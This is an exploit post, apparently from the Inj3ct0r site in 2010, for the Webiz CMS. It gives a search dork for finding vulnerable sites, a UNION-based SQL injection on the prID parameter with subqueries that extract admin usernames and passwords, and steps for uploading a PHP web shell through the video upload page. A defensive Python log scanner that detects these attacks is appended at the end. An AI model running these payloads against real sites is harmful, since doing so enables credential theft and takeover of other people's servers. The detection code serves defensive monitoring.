
Webiz SQL Injection / SHELL Upload Vulnerability

Posted on 29 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Webiz SQL Injection / SHELL Upload Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
================================================
Webiz SQL Injection / SHELL Upload Vulnerability
================================================

============================================================================
                               INFORMATION
============================================================================
==  Developers : www.webiz.gr
==  vulner     : SQL INJECTION
==  Bug        : ../wmt/webpages/index.php
==  Variable1  : &amp;prID=
==  Variable2  : &amp;apprec=
==
==  dork       : Powered by Webiz inurl:'wmt/webpages'
==
============================================================================
============================================================================
                                 EXPLOIT
============================================================================
==
==  Dork     : Powered by Webiz inurl:'wmt/webpages'
==
==  URL      : ../wmt/webpages/index.php?lid=&amp;pid=&amp;prID=[Injection Here]
==
==  Demo     : http://localhost/wmt/webpages/index.php?lid=&amp;pid=&amp;prID=999.9'
==
==  exploit  : index.php?lid=&amp;pid=&amp;prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20--
==
==  database : MySQL 5
==
==  *** Insert This Code in THE VALID COLUMN ***
==  *** CHANGE [DATABASE_NAME] ***
==
==  USERNAME
==
==  (SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
==  USER PASSWORD
==
==  (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1)
==
==  -------------------------------------------
==  *** YOU MUST HAVE ADMINISTRATOR RIGHTS ***
==  -------------------------------------------
==
==  BUG
==  ../wmt/siteadmin/videos.php
==
==  PHP file Upload
==
==  upload your shell from here
==  http://[localhost]/wmt/siteadmin/videos.php &gt;&gt; shell.php
==
==  Get it
==  http://[localhost]/wmt/userfiles/Media/videos/shell.php
=============================================================================

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-29]</pre></body></html>
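A defender-side check for the two issues above, as an added example that is not part of the original advisory: it scans web-server access-log lines for non-numeric prID/apprec values on index.php and for script files requested from the videos upload directory. The log lines are constructed, the combined log format is assumed, and treating prID and apprec as numeric IDs is an assumption based on the advisory's demo values.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths and parameter names are taken from the advisory text.
INDEX_PATH = "/wmt/webpages/index.php"
UPLOAD_DIR = "/wmt/userfiles/Media/videos/"
INJECTABLE_PARAMS = ("prID", "apprec")

# Assumption: both parameters carry plain numeric IDs in normal use.
NUMERIC = re.compile(r"-?\d+(\.\d+)?")
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Request field of a combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return the findings (possibly empty) for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    findings = []
    if url.path.endswith(INDEX_PATH):
        # parse_qs percent-decodes values, so %27 is seen as a quote.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in INJECTABLE_PARAMS:
            for value in params.get(name, []):
                if value and not NUMERIC.fullmatch(value):
                    findings.append(f"non-numeric {name}")
    if UPLOAD_DIR in url.path and SCRIPT_EXT.search(url.path):
        findings.append("script requested from upload directory")
    return findings

def scan(lines):
    """Map line number (1-based) to findings, skipping clean lines."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits[number] = findings
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2010:10:00:01 +0000] "GET /wmt/webpages/index.php?lid=&pid=&prID=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/May/2010:10:02:13 +0000] "GET /wmt/webpages/index.php?lid=&pid=&prID=999.9%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [29/May/2010:10:03:40 +0000] "GET /wmt/userfiles/Media/videos/intro.flv HTTP/1.1" 200 90211',
    '198.51.100.7 - - [29/May/2010:10:05:02 +0000] "GET /wmt/userfiles/Media/videos/shell.php HTTP/1.1" 200 48',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, findings)
```

A hit on the second rule means a script already sits in a web-served upload directory, so treat it as an incident rather than a probe.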

 
